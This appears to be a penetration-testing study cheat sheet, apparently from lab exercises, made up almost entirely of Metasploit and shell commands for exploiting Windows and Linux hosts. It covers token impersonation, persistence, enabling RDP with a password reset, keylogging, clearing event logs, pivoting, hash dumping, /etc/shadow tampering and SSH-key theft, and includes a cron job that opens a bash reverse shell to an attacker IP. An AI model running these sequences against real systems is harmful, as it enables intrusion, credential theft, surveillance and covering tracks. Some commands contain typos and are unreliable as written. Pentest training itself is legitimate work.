Token Impersonation With Incognito

> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> sysinfo
> getprivs
> load incognito
> list_tokens -u
> impersonate_token "ATTACKDEFENSE\Administrator"
> getuid
> migrate <>
> getuid
copy

Windows Persistence

> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> background
> search platform:windows name:persistence
> use exploit/windows/local/persistence_service
> set payload windows/x64/meterpreter/reverse_tcp
> set SESSION 1
> exploit
> set payload windows/meterpreter/reverse_tcp
> exploit
> sysinfo
> sessions -K


> use multi/handler
> set LHOST eth1
> run
copy

Enabling RDP

> use exploit/windows/http/badblue_passthru
> set RHOSTS
> set target Badblue\ EE\ 2.7\ Universal
> exploit
> background
> search enable_rdp
> use post/windows/manage/enable_rdp
> set SESSION 1
> exploit
> db_nmap -sV -p 3389 <IP>
> shell 
> net user administrator hacker_123321 // Change Password
> xfreerdp /u:administrator /p:hacker_123321 /v:<IP>
copy

Windows Keylogging

> use exploit/windows/http/badblue_passthru
> exploit
> pgrep explorer
> migrate <ID>
> keyscan_start
> keyscan_dump
copy

Clearing Windows Event Logs

> use exploit/windows/http/badblue_passthru
> exploit
> clearev // Deletes Event Logs
copy

Windows Pivoting

> use exploit/windows/http/rejetto_hfs_exec
> exploit
> sysinfo
> ipconfig // Copy the IP which is from same subnet : Victim 2
> run autoroute -s <IP>/<range> (Range-20)
> background
> use auxiliary/scanner/portscan/tcp
> set RHOSTS <Victim2>
> set PORTS 1-100
> exploit
> sessions 1
> portfwd add -l 1234 -p 80 -r <Victim-2-Ip>
> background
> db_nmap -sS -sV -p 1234 localhost
> use exploit/windows/http/badblue_passthru
> set payload windows/meterpreter/bind_tcp
> set RHOSTS <V-2-Ip>
> set LPORT 4433
> exploit
> sysinfo
copy

Linux Post Exploitation

Post-Exploitation Modules

> search samba
> use exploit/linux/samba/is_known_pipename
> set RHOSTS <IP>
> exploit
> pwd
> background
> sessions -u 1 
> sessions 2
> sysinfo
> getuid
> shell
> /bin/bash -i
> whoami
> uname -r 
> uname -a 
> ifconfig
> ip a s 
> netstat -antp
> ps aux
> env
> terminate
> sessions -u 1 
> search enum_configs
> set SESSION <Meterpreter>
> run
> loot
> serach env platform:linux 
> use post/multi/gather/env
> set SESSION <id>
> run
> search enum_network
> use post/linux/gather/enum_network
> set SESSION <id>
> run
> search enum_protections
> set SESSION <id>
> run
> notes
> search enum_system
> set SESSION <id>
> run
> serach checkcontainer
> set SESSION <id>
> run
> search enum_users_history
> set SESSION <id>
> run
copy

Linux Privilege Escalation

> setg RHOSTS <IP>
> search ssh_login
> use auxiliary/scanner/ssh/ssh_login
> set USERNAME jackie
> set PASSWORD password
> exploit
> sessions 1 
> pwd
> whoami
> background
> sessions -u 1 
> sessions 2
> sysinfo
> getuid
> bash
> ps aux 
> cat /bin/check-down
> chkrootkit --help
> chkrootkit -V
> background
> saerch chkrootkit
> show options
> set CHKROOKIT /bin/chkrootkit
> set SESSION <mp-id>
> set LHOST eth1
> exploit
> /bin/bash -i
copy

Dumping Hashes with Hashdump

> setg RHOSTS <IP>
> use exploit/linux/samba/is_known_pipename
> exploit
> sessions -u 1
> sessions 2
> sysinfo
> getuid
> background
> search hashdump
> use post/linux/gather/hashdump
> show options
> set SESSION <id>
> run
> loot
> sessions 3
> /bin/bash -i
copy

Establishing Persistence on Linux

> use auxiliary/scanner/ssh/ssh_login
> set USERNAME jackie
> set PASSWORD password
> exploit
> sessions
> sessions -u 1
> sessions 2
> search chkrootkit
> set SESSION <id>
> set CHKROOTKIT /bin/chkrootkit
> set LHOSTS eth1
> set LPORT <>
> exploit
> sessions -u 3
> sessions 4
> getuid
> shell
> /bin/bash -i
> useradd -m ftp -s /bin/bash
> passwd ftp // enter: password123
> cat /etc/passwd
> groups root
> usermod -aG root ftp
> groups ftp
> usermod -u 15 ftp
> cat /etc/passwd
> search platform:linux persistence
> use exploit/linux/local/cron_persistence
> set SESSION 4
> set LPORT 4422
> set LHOST eth1
> exploit // fail
> use exploit/linux/local/service_persistence
> set SESSION 4
> set payload cmd/unix/reverse_python
> set LPORT 4422
> exploit // fail
> set target 4
> exploit // fail
> use exploit/linux/local/sshkey_persistence
> set CREATESSHFOLDER true
> set SESSION 4
> exploit 
> loot
> cat private_key.txt // use from loot
> nano ssh_key // paste the key
> chmod 0400 ssh_key
> ssh -i ssh_key root@<target-ip>
> 
copy

Exploitation

Banner Grabbing

> nmap -sV -O <IP>
> ls -la /usr/share/nmap/scripts | grep banner
> nmap -sV --script=banner <IP>
> nc <IP> <Port>
copy

Nmap Vulnerability Scanning

> nmap -sV -O <IP>
> ls -la /usr/share/nmap/scripts/ | grep http
> nmap -sV --script=http-enum <IP>
copy

Post Exploitation

Methodology

• Local Enumeration
• Transferring Files
• Upgrading Shells
• Privilege Escalation
• Persistence
• Dumping & Cracking Hashes
• Pivoting
• Clearing Tracks

Windows

Enum Users & Groups

> use post/windows/gather/enum_logged_on_users
> set SESSION 1
> run
> shell
> net user administrator
> whoami /priv
> route print
> netstat -ano
> netsh firewall show state
> tasklist /SVC // Enumerate the list of running processes

> show_mount
> use post/windows/gather/win_privs
> set SESSION 1
> run
> use post/windows/gather/enum_applications
> use post/windows/gather/enum_computers
> use post/windows/gather/enum_patches
copy

Linux

Enum

> useradd bob -s /bin/bash
> githum.com/rebootuser/LinEnum
copy

Windows Priv Escalation

> PrivescCheck
> search web_delivery
> use exploit/multi/script/web_delivery
> set TARGET PSH\ (Binary)
> set payload windows/shell/reverse_tcp
> set PSH-EncodedCommand false
> set LHOST eth1
> exploit
> copy & paste in windows cmd
> whoami
> background
> use shell_to_meterpreter
> set LHOST eth1
> set WIN_TRANSFER VBS
> exploit
copy

Linux Priv Escalation

// Exploiting Permissions
> whoami
> cat /etc/passwd
> find / -not -type l -perm -o+w
> cat /etc/shadow
> openssl passwd -1 -salt abc password
> nano /etc/shadow  // Remove * & paste the hash
> su 

// Exploiting SUDO Privs
> cat /etc/passwd
> sudo -l 
> sudo man cat 
> !/bin/bash
copy

Linux Persistence

// Via SSH Keys
> ssh student@<IP> // password:password
> ls -la
> cat wait
> cd .ssh
> cat id_rsa
> cat authorized_key
> scp student@<IP>:~/.ssh/id_rsa . // copy id_rsa locally
> chmod 400 id_rsa
> ssh student@<IP> // password:password
> rm wait
> ssh -i id_rsa student@<IP>

// Via Cron Jobs
> ssh student@<IP> // password:password
> cat /etc/cron*
> echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<kali-ip>/<port> 0>&1'" > cron
> cat cron 
> crontab -i cron
> crontab -l
> rm wait
> nc -nvlp 1234
> 
copy